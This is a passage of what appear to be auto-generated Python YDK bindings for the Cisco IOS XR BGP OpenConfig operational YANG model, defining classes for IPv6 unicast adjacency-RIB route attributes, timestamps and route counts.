            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.Community, self).__init__()
        self.yang_name = "community"
        self.yang_parent_name = "route-attr-list"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # leaf-only container
        self._leafs = OrderedDict([
            ('objects', (YLeaf(YType.str, 'objects'), ['str'])),
        ])
        self.objects = None
        self._segment_path = lambda: "community"
        # Freeze the entity: subsequent writes must go through __setattr__ validation.
        self._is_frozen = True

    def __setattr__(self, name, value):
        """Route attribute writes through the entity framework's validating setter; 'objects' is the only leaf."""
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.Community, ['objects'], name, value)

    @staticmethod
    def _meta_info():
        """Look up this class's entry in the generated meta-info table."""
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.Community']['meta_info']
@staticmethod
def _meta_info():
    """Look up RouteAttrList's entry in the generated meta-info table."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList']['meta_info']
class ExtAttributesList(_Entity_):
"""
ExtAttributesList
.. attribute:: originator_id
OriginatorID
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: aigp
AIGP
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
.. attribute:: path_id
PathId
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: cluster
ClusterList
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ext_community
ExtendedCommunityArray
**type**\: list of :py:class:`ExtCommunity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.ExtCommunity>`
**config**\: False
.. attribute:: unknown_attributes
UnknownAttributes
**type**\: list of :py:class:`UnknownAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.UnknownAttributes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    """Set up YANG metadata for ext-attributes-list: extended-attribute leafs plus the ext-community and unknown-attributes lists."""
    if sys.version_info > (3,):
        super().__init__()
    else:
        # Python 2 needs the explicit two-argument form of super().
        super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList, self).__init__()
    self.yang_name = "ext-attributes-list"
    self.yang_parent_name = "route"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # YANG child name -> (python attribute name, implementing class)
    self._child_classes = OrderedDict([("ext-community", ("ext_community", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.ExtCommunity)), ("unknown-attributes", ("unknown_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.UnknownAttributes))])
    # python leaf name -> (YLeaf descriptor, accepted python types); 'cluster' is a leaf-list.
    self._leafs = OrderedDict([
        ('originator_id', (YLeaf(YType.str, 'originator-id'), ['str'])),
        ('aigp', (YLeaf(YType.uint64, 'aigp'), ['int'])),
        ('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
        ('cluster', (YLeafList(YType.str, 'cluster'), ['str'])),
    ])
    self.originator_id = None
    self.aigp = None
    self.path_id = None
    self.cluster = []
    self.ext_community = YList(self)  # dynamic list of ExtCommunity entries
    self.unknown_attributes = YList(self)  # dynamic list of UnknownAttributes entries
    self._segment_path = lambda: "ext-attributes-list"
    # Freeze the entity: subsequent writes must go through __setattr__ validation.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through the entity framework's validating setter for this container's leafs."""
    self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList, ['originator_id', 'aigp', 'path_id', 'cluster'], name, value)
class ExtCommunity(_Entity_):
    """
    ExtendedCommunityArray

    .. attribute:: objects

        BGP OC objects
        **type**\: str
        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        """Set up YANG metadata for an ext-community list entry (single 'objects' string leaf)."""
        if sys.version_info > (3,):
            super().__init__()
        else:
            # Python 2 needs the explicit two-argument form of super().
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.ExtCommunity, self).__init__()
        self.yang_name = "ext-community"
        self.yang_parent_name = "ext-attributes-list"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # leaf-only container
        self._leafs = OrderedDict([
            ('objects', (YLeaf(YType.str, 'objects'), ['str'])),
        ])
        self.objects = None
        self._segment_path = lambda: "ext-community"
        # Freeze the entity: subsequent writes must go through __setattr__ validation.
        self._is_frozen = True

    def __setattr__(self, name, value):
        """Route attribute writes through the entity framework's validating setter; 'objects' is the only leaf."""
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.ExtCommunity, ['objects'], name, value)

    @staticmethod
    def _meta_info():
        """Look up this class's entry in the generated meta-info table."""
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.ExtCommunity']['meta_info']
class UnknownAttributes(_Entity_):
    """
    UnknownAttributes

    .. attribute:: attribute_type

        AttributeType
        **type**\: int
        **range:** 0..65535
        **config**\: False

    .. attribute:: attribute_length

        AttributeLength
        **type**\: int
        **range:** 0..65535
        **config**\: False

    .. attribute:: attribute_value

        AttributeValue
        **type**\: str
        **pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        """Set up YANG metadata for an unknown-attributes list entry (type/length/value leafs, no children)."""
        if sys.version_info > (3,):
            super().__init__()
        else:
            # Python 2 needs the explicit two-argument form of super().
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.UnknownAttributes, self).__init__()
        self.yang_name = "unknown-attributes"
        self.yang_parent_name = "ext-attributes-list"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # leaf-only container
        self._leafs = OrderedDict([
            ('attribute_type', (YLeaf(YType.uint16, 'attribute-type'), ['int'])),
            ('attribute_length', (YLeaf(YType.uint16, 'attribute-length'), ['int'])),
            ('attribute_value', (YLeaf(YType.str, 'attribute-value'), ['str'])),
        ])
        self.attribute_type = None
        self.attribute_length = None
        self.attribute_value = None
        self._segment_path = lambda: "unknown-attributes"
        # Freeze the entity: subsequent writes must go through __setattr__ validation.
        self._is_frozen = True

    def __setattr__(self, name, value):
        """Route attribute writes through the entity framework's validating setter for this container's leafs."""
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.UnknownAttributes, ['attribute_type', 'attribute_length', 'attribute_value'], name, value)

    @staticmethod
    def _meta_info():
        """Look up this class's entry in the generated meta-info table."""
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.UnknownAttributes']['meta_info']
@staticmethod
def _meta_info():
    """Look up ExtAttributesList's entry in the generated meta-info table."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList']['meta_info']
class LastModifiedDate(_Entity_):
    """
    LastModifiedDate

    .. attribute:: time_value

        TimeValue
        **type**\: str
        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        """Set up YANG metadata for last-modified-date (single 'time-value' string leaf)."""
        if sys.version_info > (3,):
            super().__init__()
        else:
            # Python 2 needs the explicit two-argument form of super().
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate, self).__init__()
        self.yang_name = "last-modified-date"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # leaf-only container
        self._leafs = OrderedDict([
            ('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
        ])
        self.time_value = None
        self._segment_path = lambda: "last-modified-date"
        # Freeze the entity: subsequent writes must go through __setattr__ validation.
        self._is_frozen = True

    def __setattr__(self, name, value):
        """Route attribute writes through the entity framework's validating setter; 'time_value' is the only leaf."""
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate, ['time_value'], name, value)

    @staticmethod
    def _meta_info():
        """Look up this class's entry in the generated meta-info table."""
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate']['meta_info']
class LastUpdateRecieved(_Entity_):
    """
    LastUpdateRecieved

    (Note: the "Recieved" spelling is fixed by the YANG model node name.)

    .. attribute:: time_value

        TimeValue
        **type**\: str
        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        """Set up YANG metadata for last-update-recieved (single 'time-value' string leaf)."""
        if sys.version_info > (3,):
            super().__init__()
        else:
            # Python 2 needs the explicit two-argument form of super().
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved, self).__init__()
        self.yang_name = "last-update-recieved"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # leaf-only container
        self._leafs = OrderedDict([
            ('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
        ])
        self.time_value = None
        self._segment_path = lambda: "last-update-recieved"
        # Freeze the entity: subsequent writes must go through __setattr__ validation.
        self._is_frozen = True

    def __setattr__(self, name, value):
        """Route attribute writes through the entity framework's validating setter; 'time_value' is the only leaf."""
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved, ['time_value'], name, value)

    @staticmethod
    def _meta_info():
        """Look up this class's entry in the generated meta-info table."""
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-information entry for this Route list entry."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-information entry for the Routes container."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes']
    return entry['meta_info']
class NumRoutes(_Entity_):
    """
    Number of routes in adjacency rib out\-bound
    post\-policy table
    .. attribute:: num_routes
    NumRoutes
    **type**\: int
    **range:** 0..18446744073709551615
    **config**\: False
    """

    # NOTE(review): the docstring says "out-bound" but this container sits
    # under adj-rib-in-post; wording appears inherited from the model — confirm.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Py2/Py3-compatible call into the _Entity_ base initializer.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes, self).__init__()

        self.yang_name = "num-routes"
        self.yang_parent_name = "adj-rib-in-post"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # leaf-only container: no children
        self._leafs = OrderedDict([
            ('num_routes', (YLeaf(YType.uint64, 'num-routes'), ['int'])),
        ])
        self.num_routes = None
        self._segment_path = lambda: "num-routes"
        # Freeze last so the preceding assignments are accepted by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes, ['num_routes'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-information entry for AdjRibInPost."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost']
    return entry['meta_info']
class AdjRibOutPost(_Entity_):
"""
Adjacency rib out\-bound post\-policy table
.. attribute:: routes
routes table
**type**\: :py:class:`Routes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes>`
**config**\: False
.. attribute:: num_routes
Number of routes in adjacency rib out\-bound post\-policy table
**type**\: :py:class:`NumRoutes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # Py2/Py3-compatible call into the _Entity_ base initializer.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost, self).__init__()

    self.yang_name = "adj-rib-out-post"
    self.yang_parent_name = "open-config-neighbor"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Maps YANG child segment -> (python attribute name, child class).
    self._child_classes = OrderedDict([("routes", ("routes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes)), ("num-routes", ("num_routes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes))])
    self._leafs = OrderedDict()  # no leafs directly on this container

    # Eagerly instantiate the two singleton child containers.
    self.routes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes()
    self.routes.parent = self
    self._children_name_map["routes"] = "routes"
    self.num_routes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes()
    self.num_routes.parent = self
    self._children_name_map["num_routes"] = "num-routes"
    self._segment_path = lambda: "adj-rib-out-post"
    # Freeze last so the preceding assignments are accepted by __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    # No writable leafs on this container — only child entities may be set.
    writable_leafs = []
    self._perform_setattr(
        OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost,
        writable_leafs,
        name,
        value)
class Routes(_Entity_):
"""
routes table
.. attribute:: route
route entry
**type**\: list of :py:class:`Route <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # Py2/Py3-compatible call into the _Entity_ base initializer.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes, self).__init__()

    self.yang_name = "routes"
    self.yang_parent_name = "adj-rib-out-post"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Single child kind: the keyless "route" YANG list.
    self._child_classes = OrderedDict([("route", ("route", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route))])
    self._leafs = OrderedDict()  # no leafs directly on this container
    self.route = YList(self)  # list of Route entries
    self._segment_path = lambda: "routes"
    # Freeze last so the preceding assignments are accepted by __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    # No writable leafs here — only the 'route' YList child is assignable.
    writable_leafs = []
    self._perform_setattr(
        OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes,
        writable_leafs,
        name,
        value)
class Route(_Entity_):
"""
route entry
.. attribute:: route
Network in prefix/length format
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
**config**\: False
.. attribute:: neighbor_address
Neighbor address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: path_id
Path ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_name
Prefix
**type**\: :py:class:`PrefixName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName>`
**config**\: False
.. attribute:: route_attr_list
RouteAttributesList
**type**\: :py:class:`RouteAttrList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList>`
**config**\: False
.. attribute:: ext_attributes_list
ExtAttributesList
**type**\: :py:class:`ExtAttributesList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList>`
**config**\: False
.. attribute:: last_modified_date
LastModifiedDate
**type**\: :py:class:`LastModifiedDate <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate>`
**config**\: False
.. attribute:: last_update_recieved
LastUpdateRecieved
**type**\: :py:class:`LastUpdateRecieved <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved>`
**config**\: False
.. attribute:: valid_route
ValidRoute
**type**\: bool
**config**\: False
.. attribute:: invalid_reason
IndentityRef
**type**\: :py:class:`BgpOcInvalidRouteReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcInvalidRouteReason>`
**config**\: False
.. attribute:: best_path
BestPath
**type**\: bool
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # Py2/Py3-compatible call into the _Entity_ base initializer.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route, self).__init__()

    self.yang_name = "route"
    self.yang_parent_name = "routes"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []  # keyless YANG list entry
    # Maps YANG child segment -> (python attribute name, child class).
    self._child_classes = OrderedDict([("prefix-name", ("prefix_name", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName)), ("route-attr-list", ("route_attr_list", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList)), ("ext-attributes-list", ("ext_attributes_list", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList)), ("last-modified-date", ("last_modified_date", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate)), ("last-update-recieved", ("last_update_recieved", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved))])
    # Leaf metadata: python name -> (YLeaf descriptor, accepted python types).
    # 'route' and 'neighbor_address' are YANG unions of two string patterns,
    # hence the doubled ['str','str'].
    self._leafs = OrderedDict([
        ('route', (YLeaf(YType.str, 'route'), ['str','str'])),
        ('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
        ('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
        ('valid_route', (YLeaf(YType.boolean, 'valid-route'), ['bool'])),
        ('invalid_reason', (YLeaf(YType.enumeration, 'invalid-reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcInvalidRouteReason', '')])),
        ('best_path', (YLeaf(YType.boolean, 'best-path'), ['bool'])),
    ])
    self.route = None
    self.neighbor_address = None
    self.path_id = None
    self.valid_route = None
    self.invalid_reason = None
    self.best_path = None

    # Eagerly instantiate the singleton child containers.
    self.prefix_name = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName()
    self.prefix_name.parent = self
    self._children_name_map["prefix_name"] = "prefix-name"
    self.route_attr_list = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList()
    self.route_attr_list.parent = self
    self._children_name_map["route_attr_list"] = "route-attr-list"
    self.ext_attributes_list = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList()
    self.ext_attributes_list.parent = self
    self._children_name_map["ext_attributes_list"] = "ext-attributes-list"
    self.last_modified_date = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate()
    self.last_modified_date.parent = self
    self._children_name_map["last_modified_date"] = "last-modified-date"
    self.last_update_recieved = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved()
    self.last_update_recieved.parent = self
    self._children_name_map["last_update_recieved"] = "last-update-recieved"
    self._segment_path = lambda: "route"
    # Freeze last so the preceding assignments are accepted by __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    # Route every attribute write through YDK's validating setter.
    writable_leafs = [
        'route',
        'neighbor_address',
        'path_id',
        'valid_route',
        'invalid_reason',
        'best_path',
    ]
    self._perform_setattr(
        OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route,
        writable_leafs,
        name,
        value)
class PrefixName(_Entity_):
    """
    Prefix
    .. attribute:: prefix
    Prefix
    **type**\: :py:class:`Prefix <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix>`
    **config**\: False
    .. attribute:: prefix_length
    Prefix length
    **type**\: int
    **range:** 0..255
    **config**\: False
    """

    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Py2/Py3-compatible call into the _Entity_ base initializer.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName, self).__init__()

        self.yang_name = "prefix-name"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
